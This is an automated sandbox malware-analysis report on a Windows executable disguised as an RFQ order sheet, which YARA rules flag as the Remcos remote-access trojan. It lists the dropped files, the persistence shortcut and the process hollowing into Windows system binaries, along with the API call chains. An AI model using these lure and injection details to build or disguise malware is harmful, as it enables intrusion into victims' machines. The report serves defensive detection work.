Static PE information: Filename: RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe

Source: RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: 8.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.dialer.exe.10590000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.mobsync.exe.10591897.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.secinit.exe.10590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.secinit.exe.500000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.secinit.exe.10591897.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.secinit.exe.10591897.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.secinit.exe.500000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.dialer.exe.10590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.dialer.exe.10591897.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.dialer.exe.10591897.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.dialer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.dialer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.secinit.exe.10590000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.mobsync.exe.10591897.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000002.356743910.0000000000500000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000002.356991304.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000002.492970715.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000012.00000002.331771013.0000000010590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\Public\Libraries\xzvghsC.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_00412598 ExitWindowsEx,LoadLibraryA,GetProcAddress,		8_2_00412598
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_00412598 ExitWindowsEx,LoadLibraryA,GetProcAddress,		18_2_00412598

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0042E02D	8_2_0042E02D
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004330D1	8_2_004330D1
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0043424F	8_2_0043424F
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0042220F	8_2_0042220F
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0045F930	8_2_0045F930
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0041A3F8	8_2_0041A3F8
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004304DB	8_2_004304DB
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0044C56A	8_2_0044C56A
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004335CD	8_2_004335CD
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0043E6E0	8_2_0043E6E0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0044A725	8_2_0044A725
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004378EC	8_2_004378EC
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004228AD	8_2_004228AD
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_0045F930	8_2_0045F930
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004339E5	8_2_004339E5
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004229F0	8_2_004229F0
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0042E02D	18_2_0042E02D
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004330D1	18_2_004330D1
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0043424F	18_2_0043424F
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0042220F	18_2_0042220F
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0041A3F8	18_2_0041A3F8
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004304DB	18_2_004304DB
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0044C56A	18_2_0044C56A
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004335CD	18_2_004335CD
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0043E6E0	18_2_0043E6E0
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_0044A725	18_2_0044A725
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004378EC	18_2_004378EC
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004228AD	18_2_004228AD
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004339E5	18_2_004339E5
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004229F0	18_2_004229F0
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_00437B1B	18_2_00437B1B
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_00410BF5	18_2_00410BF5
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_00437D4A	18_2_00437D4A

Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Code function: String function: 0243CEC4 appears 45 times
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Code function: String function: 0243DEAC appears 88 times
Source: C:\Windows\SysWOW64\dialer.exe	Code function: String function: 0042EDF6 appears 36 times
Source: C:\Windows\SysWOW64\dialer.exe	Code function: String function: 0042F460 appears 43 times
Source: C:\Windows\SysWOW64\dialer.exe	Code function: String function: 00402064 appears 75 times
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: String function: 021BFDFB appears 63 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 0042EDF6 appears 36 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 0042F460 appears 33 times
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: String function: 00402064 appears 73 times

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_00413ACA CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,

8_2_00413ACA

Source: RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Cshgvzx.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Cshgvzx.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe

File read: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe 'C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe'
Source: unknown	Process created: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe 'C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe'
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: unknown	Process created: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe 'C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe'
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Process created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Process created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 8_2_004132F7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		8_2_004132F7
Source: C:\Windows\SysWOW64\dialer.exe	Code function: 18_2_004132F7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		18_2_004132F7

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Cshgvzxpdvyucjurgvmywubhtofxefb[1]

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/5@3/3

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\SysWOW64\dialer.exe

Code function: 18_2_00415D4C OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

18_2_00415D4C

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_0040D1AD GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CreateMutexA,CloseHandle,

8_2_0040D1AD

Source: C:\Windows\SysWOW64\mobsync.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-ZXIQGD

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_0040D41E FindResourceA,LoadResource,LockResource,SizeofResource,

8_2_0040D41E

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BF8D8 push ecx; mov dword ptr [esp], eax	0_3_021BF8D9
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BF8D8 push ecx; mov dword ptr [esp], eax	0_3_021BF8D9
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BF8D8 push ecx; mov dword ptr [esp], eax	0_3_021BF8D9
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BE17A push 004065BCh; ret	0_3_021BE1A0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BE17A push 004065BCh; ret	0_3_021BE1A0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BE17A push 004065BCh; ret	0_3_021BE1A0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BE17C push 004065BCh; ret	0_3_021BE1A0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BE17C push 004065BCh; ret	0_3_021BE1A0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BE17C push 004065BCh; ret	0_3_021BE1A0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BDF9A push 004063DCh; ret	0_3_021BDFC0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BDF9A push 004063DCh; ret	0_3_021BDFC0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BDF9A push 004063DCh; ret	0_3_021BDFC0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BDF9C push 004063DCh; ret	0_3_021BDFC0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BDF9C push 004063DCh; ret	0_3_021BDFC0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BDF9C push 004063DCh; ret	0_3_021BDFC0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BDFD4 push 00406414h; ret	0_3_021BDFF8
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BDFD4 push 00406414h; ret	0_3_021BDFF8
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BDFD4 push 00406414h; ret	0_3_021BDFF8
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BE48C push 004068CCh; ret	0_3_021BE4B0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BE48C push 004068CCh; ret	0_3_021BE4B0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BE48C push 004068CCh; ret	0_3_021BE4B0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BDCBC push 00406121h; ret	0_3_021BDD05
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BDCBC push 00406121h; ret	0_3_021BDD05
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BDCBC push 00406121h; ret	0_3_021BDD05
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BF8D8 push ecx; mov dword ptr [esp], eax	0_3_021BF8D9
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BF8D8 push ecx; mov dword ptr [esp], eax	0_3_021BF8D9
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BF8D8 push ecx; mov dword ptr [esp], eax	0_3_021BF8D9
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BE17A push 004065BCh; ret	0_3_021BE1A0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BE17A push 004065BCh; ret	0_3_021BE1A0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BE17A push 004065BCh; ret	0_3_021BE1A0
Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe	Code function: 0_3_021BE17C push 004065BCh; ret	0_3_021BE1A0

Source: C:\Windows\SysWOW64\mobsync.exe

Code function: 8_2_0040D072 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,

8_2_0040D072

Source: C:\Users\user\Desktop\RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe

File created: C:\Users\Public\Libraries\Cshgvzx\Cshgvzx.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\dialer.exe

Code function: 18_2_00405C3E ShellExecuteW,URLDownloadToFileW,

18_2_00405C3E

Source: C:\Windows\SysWOW64\dialer.exe

Code function: 18_2_00415D4C OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

